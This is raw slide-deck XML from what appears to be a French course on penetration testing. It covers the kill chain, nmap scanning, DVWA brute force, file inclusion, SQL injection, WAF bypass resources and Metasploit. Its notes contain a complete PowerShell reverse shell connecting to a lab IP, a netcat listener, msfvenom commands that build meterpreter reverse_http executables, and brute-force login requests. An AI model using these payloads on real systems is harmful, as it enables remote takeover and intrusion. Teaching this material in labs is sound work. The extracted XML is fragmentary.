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89"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="374" r:id="rId3"/>
    <p:sldId id="316" r:id="rId4"/>
    <p:sldId id="317" r:id="rId5"/>
    <p:sldId id="318" r:id="rId6"/>
    <p:sldId id="375" r:id="rId7"/>
    <p:sldId id="320" r:id="rId8"/>
    <p:sldId id="321" r:id="rId9"/>
    <p:sldId id="322" r:id="rId10"/>
    <p:sldId id="323" r:id="rId11"/>
    <p:sldId id="324" r:id="rId12"/>
    <p:sldId id="369" r:id="rId13"/>
    <p:sldId id="306" r:id="rId14"/>
    <p:sldId id="305" r:id="rId15"/>
    <p:sldId id="307" r:id="rId16"/>
    <p:sldId id="370" r:id="rId17"/>
    <p:sldId id="315" r:id="rId18"/>
    <p:sldId id="319" r:id="rId19"/>
    <p:sldId id="371" r:id="rId20"/>
    <p:sldId id="309" r:id="rId21"/>
    <p:sldId id="340" r:id="rId22"/>
    <p:sldId id="314" r:id="rId23"/>
    <p:sldId id="312" r:id="rId24"/>
    <p:sldId id="341" r:id="rId25"/>
    <p:sldId id="342" r:id="rId26"/>
    <p:sldId id="326" r:id="rId27"/>
    <p:sldId id="335" r:id="rId28"/>
    <p:sldId id="332" r:id="rId29"/>
    <p:sldId id="333" r:id="rId30"/>
    <p:sldId id="336" r:id="rId31"/>
    <p:sldId id="334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284" r:id="rId43"/>
    <p:sldId id="394" r:id="rId44"/>
    <p:sldId id="395" r:id="rId45"/>
    <p:sldId id="396" r:id="rId46"/>
    <p:sldId id="397" r:id="rId47"/>
    <p:sldId id="398" r:id="rId48"/>
    <p:sldId id="401" r:id="rId49"/>
    <p:sldId id="280" r:id="rId50"/>
    <p:sldId id="281" r:id="rId51"/>
    <p:sldId id="282" r:id="rId52"/>
    <p:sldId id="283" r:id="rId53"/>
    <p:sldId id="402" r:id="rId54"/>
    <p:sldId id="403" r:id="rId55"/>
    <p:sldId id="382" r:id="rId56"/>
    <p:sldId id="404" r:id="rId57"/>
    <p:sldId id="383" r:id="rId58"/>
    <p:sldId id="373" r:id="rId59"/>
    <p:sldId id="337" r:id="rId60"/>
    <p:sldId id="338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72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68421" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="2400" y="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SQRIkSj-6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Zj_7Wunnu2w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vshells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Antivirus-anti-malware" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/UBA%20(User%20Behavior%20analytics)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emagit.fr/definition/Chiffrement" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/Systeme-de-detection-dintrusions" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.lemagit.fr/definition/Pare-feu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curit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Exploit_(informatique)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rrectif" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_zero-day#cite_note-GDT-1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sec.com/metasploit-unleashed/file-inclusion-vulnerabilitie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curit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Exploit_(informatique)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rrectif" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_informatique" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://fr.wikipedia.org/wiki/Vuln%C3%A9rabilit%C3%A9_zero-day#cite_note-GDT-1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8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49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8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19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3"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=9SQRIkSj-6g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rId4"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=Zj_7Wunnu2w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64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Liens 1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https://www.youtube.com/watch?v=ujpscX1KB5M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Liens 2 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.revshells.com/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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 10 : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hidden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>noni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>ep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> bypass -c "$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Net.Sockets.TCPClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>(‘192.168.19.134', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>9001);$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>TCPClient.GetStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>();$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>IO.StreamWriter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>);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WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ($String) {[byte[]]$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>script:Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = 0..$TCPClient.ReceiveBufferSize | % {0};$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($String + 'SHELL&gt; ');$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>()}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> '';</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>NetworkStream.Read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($Buffer, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Buffer.Length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>)) -gt 0) {$Command = ([</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>text.encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>]::UTF8).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>GetString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>($Buffer, 0, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>BytesRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> - 1);$Output = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>-Expression $Command 2&gt;&amp;1 | Out-String} catch {$_ | Out-String}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>WriteToStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ($Output)}$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>StreamWriter.Close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>()" 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Machine kali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nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –v –l –p 9001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> 9001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53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6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026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reconnaissance : analyse d’attaque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exploitation : attaque proprement dit (experience et connaissance des noms d’attaques ou exploit)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CVE – les hackers opportunistes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 days  - La veille au zero days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post-exploitation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Priv esc (overflow pour s’integrer au noyeau)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LoL : Living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Pivoting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Backdooring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plateforme de protection des terminaux (ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i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Endpoint Protection Platform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EPP) est une technologie de sécurité qui protège les dispositifs terminaux (serveurs et postes de travail, notamment, tels que les ordinateurs de bureau et ordinateurs portables).</a:t>
            </a:r>
          </a:p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EPP combine plusieurs technologies de protection des terminaux en un système de sécurité consolidé. Les EPP incluent généralement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3"/>
              </a:rPr>
              <a:t>antimalwares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4"/>
              </a:rPr>
              <a:t>pare-feu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 systèmes de prévention des intrusions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5"/>
              </a:rPr>
              <a:t>IDS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), le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6"/>
              </a:rPr>
              <a:t>chiffrement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des données et l’analyse comportementale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7"/>
              </a:rPr>
              <a:t>UEBA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). Ces capacités permettent de surveiller, contrôler et sécuriser les terminaux sur l’ensemble du réseau d’une organisation.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11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Dans le domaine de la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Sécurité informatique"/>
              </a:rPr>
              <a:t>sécurité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également orthographiée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0-day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ou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 du jour zéro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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1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Vulnérabilité informatique"/>
              </a:rPr>
              <a:t>vulnérabilité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n'ayant fait l'objet d'aucune publication ou n'ayant aucun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Correctif"/>
              </a:rPr>
              <a:t>correctif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connu. L'existence d'une telle faille sur un produit informatique implique qu'aucune protection n'existe, qu'elle soit palliative ou définitive.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terminologie « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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» ne qualifie pas la gravité de la faille. Comme toute vulnérabilité, sa gravité dépend de l'importance des dégâts pouvant être occasionnés, et de l'existence d'un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Exploit (informatique)"/>
              </a:rPr>
              <a:t>exploit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c'est-à-dire d'une technique « exploitant » cette faille afin de conduire des actions indésirables sur le produit concerné.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944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7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871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https://tremblinguterus.blogspot.com/2020/11/metasploitable-2-walkthrough-part-iv.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.rapid7.com/blog/post/2022/10/07/metasploit-weekly-wrap-up-179/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45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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>pasword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> :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51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'security=low; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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/vulnerabilities/brute/?username=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=Login'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'security=medium; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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/vulnerabilities/brute/?username=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=Login'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/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=medium; PHPSESSID=45d6705ed20a045ea8a3fcf3a51fe7d8' 'http://192.168.32.129/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vulnerabilities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/brute/?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Login&amp;user_token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=****‘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310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701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545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2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17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https://www.linkedin.com/pulse/local-file-inclusionlfi-vulnerability-remote-files-access-asif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826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File Inclusion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Vulnerabilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Metasploit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Unleashed</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>www.offsec.com/metasploit-unleashed/file-inclusion-vulnerabilities/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278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https://mohammadm2.medium.com/rfi-af90905c8161</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.hackingarticles.in/comprehensive-guide-on-remote-file-inclusion-rfi/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181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738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87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http://altoro.testfire.net</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>http://altoromutual.com:8080/login.jsp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78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652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http://portswigger.net/web-security/sql-injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@aayushtiruwa120/dvwa-sql-injection-91b4efb683e4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@cybersec.ayansharma/sql-injection-on-metasploitable-2-using-sqlmap-d50bd1359ed8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102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52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baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/intel/tadk-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/theonemule/docker-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v3.x%29</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/owasp/modsecurity-crs/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/wallarm/gotestwaf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://hub.docker.com/r/intel/tadk-waf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>bionic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>http://www.youtube.com/watch?v=5eRxOYbaIEI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://www.linode.com/docs/guides/securing-nginx-with-modsecurity/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184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https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/kh4sh3i/WAF-Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://book.hacktricks.xyz/v/fr/network-services-pentesting/pentesting-web/waf-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/nemesida-waf/waf-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://book.hacktricks.xyz/pentesting-web/proxy-waf-protections-bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Interessant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>tested</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>) : https://www.howtoforge.com/install-modsecurity-3-with-nginx-on-ubuntu-22-04/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/@sangjinn/verifying-client-ip-address-in-linode-nodebalancer-environment-using-proxy-protocol-5d012aadddd9</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://medium.com/codelogicx/securing-nginx-server-using-modsecurity-oswaf-7ba79906d84c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TESTER : https://github.com/SitrakaResearchAndPOC/wafmodsec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556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https://medium.com/@evidencemonday/exploiting-vulnerabilities-in-dvwa-89b75c145d33</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Voir aussi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>videos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>cryptocat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0"/>
              <a:t> sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1"/>
              <a:t>youtube</a:t>
            </a:r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515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Dans le domaine de la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Sécurité informatique"/>
              </a:rPr>
              <a:t>sécurité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également orthographiée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0-day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ou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 du jour zéro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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1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Vulnérabilité informatique"/>
              </a:rPr>
              <a:t>vulnérabilité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n'ayant fait l'objet d'aucune publication ou n'ayant aucun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Correctif"/>
              </a:rPr>
              <a:t>correctif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connu. L'existence d'une telle faille sur un produit informatique implique qu'aucune protection n'existe, qu'elle soit palliative ou définitive.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terminologie « </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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» ne qualifie pas la gravité de la faille. Comme toute vulnérabilité, sa gravité dépend de l'importance des dégâts pouvant être occasionnés, et de l'existence d'un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Exploit (informatique)"/>
              </a:rPr>
              <a:t>exploit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c'est-à-dire d'une technique « exploitant » cette faille afin de conduire des actions indésirables sur le produit concerné.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9440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601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49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E9FC-3B73-1F6E-05FC-E5EF3549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AF614D-49EC-C05B-632A-F3AD3C6AB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752318-0346-BCBB-1058-0307B826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8C5BD-FF6D-C3A8-531A-DA5421C90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603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1511-77B3-2B6A-DB8A-79D08D3F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AAFBD3-EEF4-7A0E-434D-FC27425FF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B0D2D1-28D2-5160-FFE6-6B499C30B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F76C3-7C3C-9471-8141-86B3A23FD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348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10D8-BDBE-6A1C-AC97-80A7C62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CD9222-9547-5802-5231-84683EAE2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8A36A0-BDF0-6ACC-1C15-83AC34C4D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315350-3C8E-F89B-1F7A-A7D4A7B77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579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9DE7-5FE5-6D39-5EDD-EA24F0C6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528BB8-B958-C50A-3305-F1001B243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726ED3-F8ED-4EC3-4153-0789481A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3CB3F2-EE5D-A2C5-3C08-66A746969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https://www.youtube.com/watch?v=4t4kBkMsDbQ&amp;pp=ygUTbmV0d29ya2NodWNrICsgbm1hcA%3D%3D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Kit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Masscan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Finding host and scanning network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learning.oreilly.com/library/view/ceh-certified-ethical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check for live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-sP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check for open ports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(port 80, 443 for web)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 : for TCP using 3-way handshake (Full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1 : i'm prot 443 Are you theire (SYN)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2 : yes i'm thiere, (SYN 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3 : let's talk (ACK)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More detect by the IDS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3-way handshake without connection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-sS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 : Stealthy (half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(2way handshake)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filter by ip.addr eq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 one converstation and "apply this filter"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4. Perform banner grabbing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OS detection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-sO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Mora options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-A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5. scan vulnerabilities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namp --script vuln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https://sectools.org/tag/vuln-scanners/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https://hassen-hannachi.medium.com/installing-openvas-on-kali-linux-a54baeaf806a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https://medium.com/@careertechnologymiraroad/openvas-scanner-fa518e9301f3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https://medium.com/@kennithlowy/installing-openvas-step-by-step-guide-0aa83239a34b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https://medium.com/@sonya.moisset/guide-de-s%C3%A9curit%C3%A9-pour-les-logiciels-open-source-meilleures-pratiques-pour-s%C3%A9curiser-vos-projets-c7ea78acb615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70C4-B50B-3FD8-B360-5854482B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6C2CC-1723-D09C-4103-1EA370FC7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F90FDA-6807-57C9-D78D-DD947CA9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422DB-7058-6DDA-D496-12FD460C2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39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41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8712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545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https://www.hackerprof.com/80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5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elogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatshe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securebit/meterpreter-shell-as-a-32-64-bit-dll-2520604e41f6" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/dejisec/8cdc3398610d1a0a91d01c9e1fb02ea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CyberKillChain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Attaques/Attaquants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(1)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="550" name="Google Shape;550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1211" y="1681329"/>
            <a:ext cx="9205784" cy="45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(2)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;p6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57" name="Google Shape;55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7" y="1075623"/>
            <a:ext cx="8664558" cy="57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7E563-DEE6-9356-EC47-7766A460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Metasploit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77DD1-14D9-469A-5C8C-0AF02E4E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B397A6-C467-C621-6E8E-E12909AF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845734"/>
            <a:ext cx="5187378" cy="37518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871982-3442-EB61-9444-F8AD861E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577159"/>
            <a:ext cx="4724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Auxilliary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 de scan tel que le port d’une machine  cible, ou encore d’un service.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???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: outil permet l’accès à des donnés confidentiel des identifiants ou des mots de passe de service ou d’application, le post-exploitation vient après l’exploitation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5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: code d’exploitation par lequel un attaquant profitera d’un défaut système. On utilise un exploit d’une application ou d’un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utilisera un exploit pour attaquer une machine de façon à lui produire un résultat que les développeurs n’aurait pas envisager voir même anticiper.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exploits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6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75" y="2150076"/>
            <a:ext cx="11489725" cy="5366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Outils qui permettent de dissimuler des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 des exploits ou les deux combinés  en créant des couches sélectionnées par l’attaquant selon le système qui est utilisé sur la machine cible.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code que l’attaque souhaite exécuté sur la machine cible. Par exemple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revese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crée une connexion distante depuis la machine cible vers l’attaquant. C’est la machine cible qui se connecte à la machine de l’attaquant. Il y a certain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d’un exploit qui engendre aussi un RCE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 code qui permet de faire fonctionner un exploit ou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une machine ou sur d’autres extension puis spécifique. (par exemple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07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16BCD-2ABA-410A-270A-518D8C42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Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et binding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17474-9424-4872-12C8-D0954E4F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E8A6F-2CD1-5090-3DC7-9A7FA84B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133217" cy="42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43" y="-553839"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Msfvnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> en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31" y="108943"/>
            <a:ext cx="11557772" cy="6155933"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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 ifconfig pour trouver l’adresse IP</a:t>
            </a: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Generer puis lancer le programme malvaillant sur le client (commande en un ligne) : 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windows/meterpreter/reverse_http -a x86 –platform windows -f exe LHOST=192.168.113.133 LPORT=80 -o /home/kali/Desktop/something32.exe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windows/x64/meterpreter/reverse_http -a x64 –platform windows -f exe LHOST=192.168.113.133 LPORT=80 -o /home/kali/Desktop/something32.exe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Changer droit pour être copié après : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
